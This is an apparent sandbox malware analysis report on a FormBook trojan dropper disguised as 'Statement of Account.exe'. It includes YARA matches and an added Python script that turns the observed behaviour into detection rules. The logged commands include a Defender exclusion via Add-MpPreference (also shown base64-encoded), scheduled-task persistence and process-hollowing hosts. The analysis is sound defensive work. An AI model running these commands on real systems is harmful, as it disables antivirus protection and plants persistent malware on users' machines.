Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4176622170.000000000E808000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Statement of Account.exe PID: 6684, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: vbc.exe PID: 3756, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 4608, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: ipconfig.exe PID: 7108, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Statement of Account.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SIZfuXT.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, dHcwPaBtrBVw3QXCBV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.cs | Security API names: _0020.AddAccessRule
Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, dHcwPaBtrBVw3QXCBV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, dHcwPaBtrBVw3QXCBV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.cs | Security API names: _0020.SetAccessControl
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.evad.winEXE@535/11@11/1
Source: C:\Users\user\Desktop\Statement of Account.exe | File created: C:\Users\user\AppData\Roaming\SIZfuXT.exe
Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_03
Source: C:\Users\user\Desktop\Statement of Account.exe | File created: C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp
          Source: Statement of Account.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Statement of Account.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Statement of Account.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Statement of Account.exeReversingLabs: Detection: 76%
          Source: C:\Users\user\Desktop\Statement of Account.exeFile read: C:\Users\user\Desktop\Statement of Account.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\Statement of Account.exe "C:\Users\user\Desktop\Statement of Account.exe"
Source: C:\Users\user\Desktop\Statement of Account.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement of Account.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Statement of Account.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\SIZfuXT.exe C:\Users\user\AppData\Roaming\SIZfuXT.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
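The process-creation rows above are the whole FormBook chain in miniature: the dropper adds a Defender exclusion for its copy in AppData\Roaming, registers a scheduled task from an XML file in the user's Temp directory, launches vbc.exe with no arguments as a hollowing host, the implant in explorer.exe spawns NETSTAT.EXE, ipconfig.exe and autochk.exe (again with no arguments) as second-stage hosts, and the NETSTAT.EXE instance deletes the vbc.exe path with cmd /c del. The script below is an added example, not part of the Joe Sandbox report and not the sample's own code: it replays those rows as constructed process events and runs one check per behaviour, including the base64 -EncodedCommand form of the Add-MpPreference call that the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma match in the summary refers to. The record shape (parent, image, cmdline), the rule names and the allow-lists are assumptions; the MSBuild path in the benign control is illustrative.

```python
"""Triage of a process tree for the behaviours listed in the report above.

Added example; not Joe Sandbox output and not code from the sample. Map
your own telemetry (Sysmon event 1, Security 4688) onto ProcEvent before use.
"""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line as logged


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_no_arguments(ev: ProcEvent) -> bool:
    """True when the command line is only the (optionally quoted) image path."""
    return ev.cmdline.strip().strip('"').lower() == ev.image.lower()


ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
MPPREF_RE = re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
DOTNET_HOSTS = {"vbc.exe", "csc.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
BUILD_PARENTS = {"msbuild.exe", "devenv.exe"}  # assumed legitimate launchers of compilers
EXPLORER_CHILDREN = {"netstat.exe", "ipconfig.exe", "autochk.exe"}  # the hosts seen in this report


def effective_powershell_cmd(cmdline: str) -> str:
    """Expand a -EncodedCommand payload (base64 of UTF-16LE) so the cmdlet is visible."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def triage(events):
    """Return (rule, detail) hits in event order. Rule names are this example's own."""
    hits, bare_hosts = [], set()
    for ev in events:
        parent, child = basename(ev.parent), basename(ev.image)
        if child == "powershell.exe" and MPPREF_RE.search(effective_powershell_cmd(ev.cmdline)):
            hits.append(("defender_exclusion", ev.cmdline))
        if child == "schtasks.exe" and re.search(r"/create\b", ev.cmdline, re.I):
            m = re.search(r'/xml\s+"?([^"]+)', ev.cmdline, re.I)
            if m and TEMP_DIR_RE.search(m.group(1)):
                hits.append(("schtasks_xml_from_temp", m.group(1)))
        if child in DOTNET_HOSTS and has_no_arguments(ev) and parent not in BUILD_PARENTS:
            hits.append(("dotnet_host_no_args", ev.image))  # hollowing target, as vbc.exe is here
            bare_hosts.add(ev.image.lower())
        if parent == "explorer.exe" and child in EXPLORER_CHILDREN and has_no_arguments(ev):
            hits.append(("explorer_spawns_bare_tool", ev.image))  # second-stage injection hosts
            bare_hosts.add(ev.image.lower())
        if child == "cmd.exe":
            m = re.search(r'/c\s+del\s+"?([^"]+)', ev.cmdline, re.I)
            if m and m.group(1).lower() in bare_hosts:
                hits.append(("delete_of_hollowed_host", m.group(1)))
    return hits


def _encoded(cmd: str) -> str:
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


VBC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
DROPPER = r"C:\Users\user\Desktop\Statement of Account.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
TASKS = r"C:\Windows\SysWOW64\schtasks.exe"
EXPLORER = r"C:\Windows\explorer.exe"
NETSTAT = r"C:\Windows\SysWOW64\NETSTAT.EXE"

# Constructed from the "Process created" rows of the report; the -enc variant is
# added here to show why the encoded form must be decoded before matching.
REPORT_EVENTS = [
    ProcEvent(DROPPER, PS, f'"{PS}" Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\SIZfuXT.exe"'),
    ProcEvent(DROPPER, PS, f'"{PS}" -enc ' + _encoded('Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming\\SIZfuXT.exe"')),
    ProcEvent(DROPPER, TASKS, f'"{TASKS}" /Create /TN "Updates\\SIZfuXT" /XML "C:\\Users\\user\\AppData\\Local\\Temp\\tmpC2DD.tmp"'),
    ProcEvent(DROPPER, VBC, f'"{VBC}"'),
    ProcEvent(EXPLORER, NETSTAT, f'"{NETSTAT}"'),
    ProcEvent(NETSTAT, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{VBC}"'),
]

# Constructed benign control: the same tools used the way a build or an admin would.
BENIGN_EVENTS = [
    ProcEvent(r"C:\Program Files\MSBuild\msbuild.exe", VBC, f'"{VBC}" /noconfig @"C:\\build\\vbc.rsp"'),
    ProcEvent(EXPLORER, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe"'),
    ProcEvent(PS, TASKS, f'"{TASKS}" /Create /TN "Backup" /XML "C:\\ProgramData\\Backup\\task.xml"'),
    ProcEvent(EXPLORER, PS, f'"{PS}" Get-MpPreference'),
]

if __name__ == "__main__":
    for rule, detail in triage(REPORT_EVENTS):
        print(f"{rule:28s} {detail}")
```

The last rule only fires when the deleted path was itself spawned with no arguments earlier in the same tree, which is what ties the cmd /c del row to the hollowed vbc.exe rather than to any ordinary file cleanup; keep the ordering of events when feeding real telemetry in, or the check silently misses.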
Source: C:\Users\user\Desktop\Statement of Account.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, iconcodecservice.dll, ntmarta.dll, sspicli.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Sections loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\AppData\Roaming\SIZfuXT.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, iconcodecservice.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Sections loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Sections loaded: iphlpapi.dll, snmpapi.dll, wininet.dll
Source: C:\Windows\SysWOW64\ipconfig.exe | Sections loaded: iphlpapi.dll, dhcpcsvc.dll, dhcpcsvc6.dll, dnsapi.dll
Source: C:\Users\user\Desktop\Statement of Account.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Statement of Account.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Statement of Account.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Statement of Account.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: ipconfig.pdb source: vbc.exe, 0000000C.00000002.1858338793.00000000052E7000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.1858179937.0000000005240000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861396265.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: explorer.exe, 00000007.00000002.4177672718.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4167058236.0000000003F7F000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4166685447.0000000003AF4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netstat.pdbGCTL source: vbc.exe, 00000006.00000002.1797607492.00000000057A0000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000006.00000002.1797670992.00000000057B7000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4164513188.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: vbc.exe, 0000000C.00000002.1858338793.00000000052E7000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.1858179937.0000000005240000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861396265.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.1797607492.00000000057A0000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000006.00000002.1797670992.00000000057B7000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4164513188.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1798892977.00000000035F1000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.000000000393E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1796711119.0000000003448000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.000000000318E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1857901352.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1859917399.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1798892977.00000000035F1000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4165789818.000000000393E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.1796711119.0000000003448000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.000000000318E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1857901352.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861641173.0000000002FF0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000011.00000003.1859917399.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: vbc.pdb source: explorer.exe, 00000007.00000002.4177672718.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4167058236.0000000003F7F000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4166685447.0000000003AF4000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.cs | .Net Code: h2ApMUZCVK System.Reflection.Assembly.Load(byte[])
Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.cs | .Net Code: h2ApMUZCVK System.Reflection.Assembly.Load(byte[])
Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.cs | .Net Code: h2ApMUZCVK System.Reflection.Assembly.Load(byte[])
Source: 0.2.Statement of Account.exe.302a868.1.raw.unpack, RZ.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Statement of Account.exe.303bac4.0.raw.unpack, RZ.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Statement of Account.exe.8f20000.4.raw.unpack, RZ.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
